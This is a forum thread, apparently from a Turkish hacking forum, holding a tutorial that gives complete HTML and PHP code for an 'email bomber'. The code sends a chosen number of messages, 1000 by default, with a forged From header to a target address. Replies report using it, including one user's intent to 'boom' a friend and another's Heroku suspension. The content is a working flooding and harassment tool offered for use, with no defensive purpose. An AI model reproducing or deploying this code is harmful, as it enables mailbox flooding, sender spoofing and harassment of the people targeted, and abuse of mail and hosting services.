Simple PHP & HTML | Email Bomber

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Seçkin Üye
Katılım
17 Mar 2020
Mesajlar
298
Tepki puanı
26
Ödüller
5
Yaş
27
6 HİZMET YILI
Hey guys it's Puddy i'm back with another tutorial.

I will be showing you how to make a simple email bomber.
:ph34r:





Okay so things you will need:

1x Webhosting | Make sure you have SMTP >_> or it wont work
1x Little knowledge with php & html.
1x A text editor.

Okay so after you have all that we can get started!

1 : So first we will want to create a file called "index.html"

2 : We will place the following code in the index.html
<html>
<head>
<title>Email Bomber</title>
</head>
<body>
<center>
<h1 style="color:white;font-shadow:0px 0px 2px blue;">Simple Email Bomber</h1><br>
<!--This is where the forms starts-->
<form action="email.php" method="post"><br>
Email: <input type="text" name="email" /><br>
Amount to send : <input type="text" name="spam" /><br>
Subject: <input type="text" name="subject" /><br>
Message: <TEXTAREA NAME="message" ROWS=6 COLS=40></TEXTAREA><br>
From: <input type="text" name="from" /><br>
<input type="submit" value="send" /><input type="reset" />
</form>
</center>
</body>
</html>
3 : Go ahead and save that file in a folder, name the folder what-ever you want.
4 : Now in that folder go ahead and create a file named "email.php"
5 : Now open the email.php and place the following code inside it.
<?php

$num = 1;
$email = $_POST['email'];
$spam = $_POST['spam'];
$subject = $_POST['subject'];
$message = $_POST['message'];
$from = $_POST['from'];
$send = $_POST['send'];
if($spam==' ')
{
$spam = 1000; // this is for if the Amount to send = nothing then it will send 1000 emails
// you can change it too what-ever you want.
}


if($spam!='' && $email=='')
{
die('Please enter an email!.');
}

if($email != '')
{
while($num<=$spam)
{
mail ($email, $subject, $message, "From: " . $from);
echo $num . "<br>";
$num++;
}
}
?>
7 : Now you can go ahead and upload it to your server, and boom
:wub:

Also pls dont be a leecher
<3
B)
 
Seçkin Üye
Katılım
26 Mar 2020
Mesajlar
302
Çözümler
1
Tepki puanı
13
Ödüller
2
Yaş
35
6 HİZMET YILI
iam try it but the header doesnt appear do u have any fix to it ?
 
Uzman Üye
Katılım
19 Nis 2020
Mesajlar
292
Tepki puanı
7
Ödüller
2
Yaş
38
6 HİZMET YILI
The title is not displayed, but I corrected this situation
 
STALKER
Seçkin Üye
Katılım
14 Şub 2019
Mesajlar
301
Tepki puanı
10
Ödüller
3
7 HİZMET YILI
Try to deploy this in heroku but got suspended haha
 
Onaylı Üye
Katılım
30 Nis 2020
Mesajlar
71
Çözümler
1
Tepki puanı
6
Ödüller
3
6 HİZMET YILI
hahah, thanks bro, and now I can boom my friend
 
Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Üst